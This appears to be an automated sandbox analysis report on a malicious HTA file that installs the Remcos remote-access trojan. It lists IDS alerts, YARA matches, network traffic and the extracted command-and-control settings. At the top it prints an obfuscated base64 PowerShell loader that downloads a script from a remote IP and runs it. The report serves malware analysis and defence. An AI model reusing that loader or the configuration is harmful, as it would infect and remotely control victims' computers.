InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4824, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline", ProcessId: 5092, ProcessName: csc.exe

Stealing of Sensitive Information

Sigma detected: Remcos

Source: Registry Key set

Author: Joe Security: Data: Details: 4F 05 39 4C 0E 10 07 FA A0 83 1E FB 6D 42 F1 51 F8 67 AF 4B A1 45 63 EA D6 6C 9E 6A F7 D5 05 90 72 B4 3E 70 38 47 53 AF 6F 17 45 44 3C CC 20 5E D7 DA 30 F1 1A 90 58 BD A2 82 9B B7 47 CF E3 03 95 99 FC 1A 4E FC 8D 63 DA 65 44 12 92 55 03 87 FB 76 92 E6 97 0D C5 F7 43 33 58 7E 81 28 CD D5 49 E7 98 A4 D1 25 0A EE 43 15 0D 8B 22 41 6D C9 DA 3C , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 6860, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-QEQMVZ\exepath

Suricata Signatures

ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T11:23:30.189989+0100	2020425	1	Exploit Kit Activity Detected	104.21.84.67	443	192.168.2.6	49759	TCP

ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T11:23:30.189989+0100	2020424	1	Exploit Kit Activity Detected	104.21.84.67	443	192.168.2.6	49759	TCP

ET JA3 Hash - Remcos 3.x/4.x TLS Connection

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T11:22:54.286610+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50016	192.169.69.26	14645	TCP
2024-12-11T11:23:42.070450+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49765	192.169.69.26	14645	TCP
2024-12-11T11:23:53.595653+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49793	192.169.69.26	14645	TCP
2024-12-11T11:24:05.016800+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49823	192.169.69.26	14645	TCP
2024-12-11T11:24:16.489153+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49851	192.169.69.26	14645	TCP
2024-12-11T11:24:27.937721+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49879	192.169.69.26	14645	TCP
2024-12-11T11:24:39.404581+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49907	192.169.69.26	14645	TCP
2024-12-11T11:24:51.203478+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49938	192.169.69.26	14645	TCP
2024-12-11T11:25:02.711340+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49965	192.169.69.26	14645	TCP
2024-12-11T11:25:14.227525+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49992	192.169.69.26	14645	TCP
2024-12-11T11:25:25.659401+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50003	192.169.69.26	14645	TCP
2024-12-11T11:25:37.107534+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50004	192.169.69.26	14645	TCP
2024-12-11T11:25:48.643825+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50006	192.169.69.26	14645	TCP
2024-12-11T11:26:00.424029+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50008	192.169.69.26	14645	TCP
2024-12-11T11:26:11.961120+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50009	192.169.69.26	14645	TCP
2024-12-11T11:26:23.541405+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50010	192.169.69.26	14645	TCP
2024-12-11T11:26:35.057421+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50012	192.169.69.26	14645	TCP
2024-12-11T11:26:46.560481+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50013	192.169.69.26	14645	TCP
2024-12-11T11:26:57.999070+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	50015	192.169.69.26	14645	TCP

ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T11:23:13.327409+0100	2049038	1	A Network Trojan was detected	151.101.1.137	443	192.168.2.6	49710	TCP

ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T11:23:31.159684+0100	2858295	1	A Network Trojan was detected	104.21.84.67	443	192.168.2.6	49759	TCP

ETPRO MALWARE ReverseLoader Payload Request (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T11:23:02.599903+0100	2858795	1	A Network Trojan was detected	192.168.2.6	49707	172.245.142.60	80	TCP

ETPRO MALWARE Terse Request to paste .ee - Possible Download

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T11:23:29.784941+0100	2841075	1	Malware Command and Control Activity Detected	192.168.2.6	49759	104.21.84.67	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://172.245.142.60/551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIF	Avira URL Cloud: Label: malware
Source: rmcnewprojectadd.duckdns.org	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000B.00000002.4536165624.0000000001348000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": ["rmcnewprojectadd.duckdns.org:14645:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-QEQMVZ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Multi AV Scanner detection for submitted file

Source: nicegirlforyou.hta	ReversingLabs: Detection: 26%
Source: nicegirlforyou.hta	Virustotal: Detection: 29%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 11.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4536165624.0000000001348000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 6860, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 11_2_0043294A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

11_2_0043294A

Source: powershell.exe, 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_6b4e9e9e-5

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 11.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 6860, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 11_2_00406764 _wcslen,CoGetObject,

11_2_00406764

Phishing

Yara detected obfuscated html page

Source: Yara match

File source: nicegirlforyou.hta, type: SAMPLE

Source: unknown	HTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49759 version: TLS 1.2

Source:	Binary string: q:C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.pdb source: powershell.exe, 00000003.00000002.2201944807.0000000004F96000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2464644266.0000000006E50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2465328781.00000000073BA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 00000008.00000002.2464644266.0000000006E50000.00000004
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2464644266.0000000006E50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2465328781.00000000073BA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2465328781.00000000073BA000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	11_2_0040B335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	11_2_0041B43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	11_2_0040B53A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_0044D5F9 FindFirstFileExA,	11_2_0044D5F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	11_2_004089A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00406AC2 FindFirstFileW,FindNextFileW,	11_2_00406AC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	11_2_00407A8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,	11_2_00418C79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	11_2_00408DA7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 11_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

11_2_00406F06

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.6:49707 -> 172.245.142.60:80
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49793 -> 192.169.69.26:14645
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49823 -> 192.169.69.26:14645
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49851 -> 192.169.69.26:14645
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49765 -> 192.169.69.26:14645
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49879 -> 192.169.69.26:14645
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49907 -> 192.169.69.26:14645
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49938 -> 192.169.69.26:14645
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49965 -> 192.169.69.26:14645
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49992 -> 192.169.69.26:14645
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50003 -> 192.169.69.26:14645
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50004 -> 192.169.69.26:14645
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50008 -> 192.169.69.26:14645
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50010 -> 192.169.69.26:14645
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50012 -> 192.169.69.26:14645
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50013 -> 192.169.69.26:14645
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50009 -> 192.169.69.26:14645
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50015 -> 192.169.69.26:14645
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50006 -> 192.169.69.26:14645
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50016 -> 192.169.69.26:14645
Source: Network traffic	Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 104.21.84.67:443 -> 192.168.2.6:49759
Source: Network traffic	Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 104.21.84.67:443 -> 192.168.2.6:49759
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.1.137:443 -> 192.168.2.6:49710
Source: Network traffic	Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 104.21.84.67:443 -> 192.168.2.6:49759

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: rmcnewprojectadd.duckdns.org

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: paste.ee

Uses dynamic DNS services

Source: unknown

DNS query: name: rmcnewprojectadd.duckdns.org

Source: global traffic	HTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /r/03xCn/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 151.101.1.137 151.101.1.137
Source: Joe Sandbox View	IP Address: 104.21.84.67 104.21.84.67
Source: Joe Sandbox View	IP Address: 104.21.84.67 104.21.84.67

Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: WOWUS WOWUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic

Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49759 -> 104.21.84.67:443

Source: global traffic

HTTP traffic detected: GET /551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.142.60Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.142.60

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 3_2_02B47A18 URLDownloadToFileW,

3_2_02B47A18

Source: global traffic	HTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /r/03xCn/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIF HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.142.60Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: res.cloudinary.com
Source: global traffic	DNS traffic detected: DNS query: paste.ee
Source: global traffic	DNS traffic detected: DNS query: rmcnewprojectadd.duckdns.org

Source: powershell.exe, 00000003.00000002.2201944807.0000000004F96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://172.245.142.60/551/sheism
Source: powershell.exe, 00000003.00000002.2201944807.0000000004F96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://172.245.142.60/551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIF
Source: powershell.exe, 00000003.00000002.2206466592.0000000007FE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.245.142.60/551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIF4
